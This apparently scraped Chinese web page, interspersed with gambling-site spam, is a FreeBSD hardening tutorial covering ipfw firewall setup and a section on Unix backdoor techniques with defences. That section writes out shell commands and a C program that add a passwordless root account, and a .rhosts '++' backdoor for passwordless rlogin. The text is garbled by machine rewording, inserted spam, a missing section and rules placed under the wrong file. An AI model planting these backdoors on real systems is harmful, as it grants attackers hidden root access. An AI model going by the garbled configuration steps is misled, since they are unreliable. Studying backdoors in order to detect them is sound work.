快捷搜索:  as  2018  FtCWSyGV  С˵  test  xxx  Ψһ  w3viyKQx

澳门新葡亰官网7598522_龟发之家论坛



四、防火墙的安装和设置

FreeBSD自带有一个基于包过滤的防火墙--ipfw,虽然功能没有专业防火墙那么强大年夜,然则敷衍一个Web站点的安然照样足够的,以是我们抉择选用该防火墙来保护我们的Web办事器。

1. 安装ipfw

IPFW 的主要部分是在内核中运行的, 是以会必要在FreeBSD内核设置设置设备摆设摆设文件中添加部分选项。(留意,假如你没有安装FreeBSD核心源代码,是无法进入以下目录的,以是运行之前必然要先安装内核源代码)我们先辈入内核设置设置设备摆设摆设文件:

# cd /sys/i386/conf

# cp GENERIC ./kernel_fw

打开内核设置设置设备摆设摆设文件:

# ee ./kernel_fw

添加四个选项,不必要后面的注释信息:

options IPFIREWALL # 将包过滤部分的代码编译进内核。

options IPFIREWALL_VERBOSE

# 启用经由过程syslo澳门新葡亰官网7598522gd记录的日志。假如没有指定这个选项,纵然您在过滤规则中指定记录包, 也不会真的记录它们

options IPFIREWALL_VERBOSE_LIMIT=10

# 限定经由过程 syslogd(8) 记录的每项包规则的记录条数。在恶劣的情况中假如您想记录防火墙的活动, 而又不想因为 syslog 洪流一样平常的记录而导致回绝办事进击, 那么这个选项将会很有用。

options IPFIREWALL_DEFAULT_TO_ACCEPT

# 这将把默认的规则动作从 ``deny'' 改为 ``allow''。这可以防止在没有设置设置设备摆设摆设防火墙之前应用启用过 IPFIREWALL 支持的内核重启时把自己锁在外貌。 别的, 假如您常常应用 ipfw(8) 来办理一些问题时它也异常有用。 只管如斯,在应用时应理小心,由于这将使防火墙洞开, 并改变它的行径。

编译内核:

# /usr/sbin/config kernel_fw

# cd ../compile/kernel_fw (留意你的版本,假如是低于5.0的版本用../../compile/kernel_fw)

# make depend

# make

# make install

重启系统。留意,我们没有选择options IPFIREWALL_DEFAULT_TO_ACCEP澳门新葡亰官网7598522T该选项,便是说默认系统启动后是打开防火墙的,并且防火墙默认是不容许任何连接的(deny from any to any),以是必然要在本地操作,否则你将被“锁在门外”,假如你选择了该选项则可以应用ssh等连接不受影响,不过这相对不安然。

2. 设置设置设备摆设摆设ipfw

假如设置设置设备摆设摆设通俗环境下的规则,应用敕令设置设置设备摆设摆设的模式:

ipfw的设置设置设备摆设摆设敕令:ipfw [-N] 敕令 [编号] 动作 [log(日志)] 协议 地址 [其它选项]

例如:

# ipfw add allow tcp from any to 10.10.10.1 80 #容许外界造访我的web办事

# ipfw add allow tcp from any to 10.10.10.1 21 #容许外貌造访我的ftp办事

# ipfw add allow tcp from any to 10.10.10.1 22 #容许外界造访我的ssh办事

假如应用规则包的形式,那么查看下面内容。

系统启动后,我们还要设置设置设备摆设摆设rc.conf文件来运行我们的防火墙:

# ee /etc/rc.conf

加入如下内容:

gateway_enable="YES" # 启动网关

firewall_enable="YES" # 激活firewall防火墙

firewall_script="/etc/rc.firewall" # firewall防火墙的默认脚本

firewall_type="/etc/ipfw.conf" # firewall自定义脚本

firewall_quiet="NO" # 起用脚本时,是否显示规则信息。现在为“NO”要是你的防火墙脚本已经定型,那么就可以把这里设置成“YES”了。

firewall_logging_enable="YES" # 启用firewall的log记录。

设置完成后我们再编辑/etc/syslog.conf文件:

########## ICMP #########

add 30000 allow icmp from any to any icmptypes 3

add 30001 allow icmp from any to any icmptypes 4

add 30002 allow icmp from any to any icmptypes 8 out

add 30003 allow icmp from any to any icmptypes 0 in

add 30004 allow icmp from any to any icmptypes 11 in

#容许自己ping别人的办事器。也容许内部收集用router敕令进行路由跟踪。

五、Unix/Linux上的后门技巧和警备

对黑客来讲,入侵一个系统只是万里长征的开始,最主要的是经久占领一个肉鸡(傀儡机),以是,后门技巧每每异常紧张。对付我们来讲,老是处于被动的职位地方,鸭蛋虽密也有缝,总有没有做到位的地方,谁都不能包管自己的系统是绝对安然的,以是不能避免我们可能会被入侵。黑客入侵后肯定会留后门,当然,除了那些高手,境界异常高,入侵只是为了测试或者技巧寻衅,对付一样平常黑客来讲,入侵之后留个后门是很紧张的,我们要警备,当然就要懂得常用的后门技巧,下面就简单的讲将在 Unix/Linux系统中对照常见的后门技巧。

1. 帐号后门

最通俗和原始的后门技巧,一样平常便是在系统中添加一个治理员帐户。

# echo "heiyeluren:*:0:0::/root:/bin/sh" >> /etc/passwd

# echo "heiyeluren::0:0::0:0::/root:/bin/sh" >> /etc/shadow

给系统增添一个 uid和gid都为0(root)的帐号,无口令。

FreeBSD的密码是存储在 /etc/master.passwd里面的,那么后面的敕令就应该改成:

# echo "heiyeluren:::::::::" >> /etc/master.passwd

也可以应用法度榜样来实现:

/* Add super user */

#include "stdio.h"

#define PASSWD_PATH "/etc/passwd"

#define SHADOW_PATH "/etc/master.passwd"

main()

{

FILE *fd;

fd = fope澳门新葡亰官网7598522n(PASSWD_PATH, "a+");

fprintf(fd, "heiyeluren:*:0:0::/root:/bin/sh\n");

fclose(fd);

fd = fopen(SHADOW_PATH, "a+");

fprintf(fd, "heiyeluren::0:0::0:0::/root:/bin/sh\n");

fclose(fd);

}

# gcc -o adduser adduser.c

# ./adduser

首先给各个主要目录加上我们上面说的文件指纹校验,知道某个目录下有什么文件,假如多出了可疑文件可以仔细反省。还有应用find敕令来查找有没有危险的root suid法度榜样:

find / -type f澳门新葡亰官网7598522 (-perm -4000 -o -perm -2000 ) -print

3. Crontab办事后门

crontab敕令就相称于windows下的at敕令,按期履行某些义务。对黑客来讲,比如按期建立一个帐户,然后过多久就删除,这样治理员永世看不到系统中有后门,这样是异常保险的。。

* 警备措施:

cron的办事默认是存储在 /var/spool/crontab/root目录下,按期反省cron办事,看是否有非常的义务在履行,或者假如你不应用cron的话,直接关闭掉落它。

4. rhosts后门

Rhosts文件经常被黑客使用来制作后门,假如系统开了rlogin、rexec等r的办事,由于象rlogin这样的办事是基于rhost澳门新葡亰官网7598522s文件里的主机名应用简单的认证措施,以是黑客只要将.rhosts文件设置成"++",那么就容许任何人从任何地方应用该用户名,无须口令登岸513端口的 rlogin办事就行。而且r之类的办事没有日志能力,不轻易被发明。

实现措施:

# echo "++" > /usr/heiyeluren/.rhosts

# rlogin -l heiyeluren localhost

这样就不必要任何密码,直接输入用户名heiyeluren就登岸到了系统。

* 警备法子:

不要应用rlogin等办事,同时也不保举应用telnet等办事,由于telnetd等守护进程溢出漏洞一堆,而且在数据传输历程中是没有加密的,很轻易被嗅探,建议应用ssh等颠末安然加密的办事来替代。

5. Login后门

login法度榜样平日用来对telnet来的用户进行口令验证. 入侵者获取login的原代码并改动使它在对照输进口令与存储口令时先反省后门口令. 假如用户敲入后门口令,它将漠视治理员设置的口令让你势不可当。

您可能还会对下面的文章感兴趣: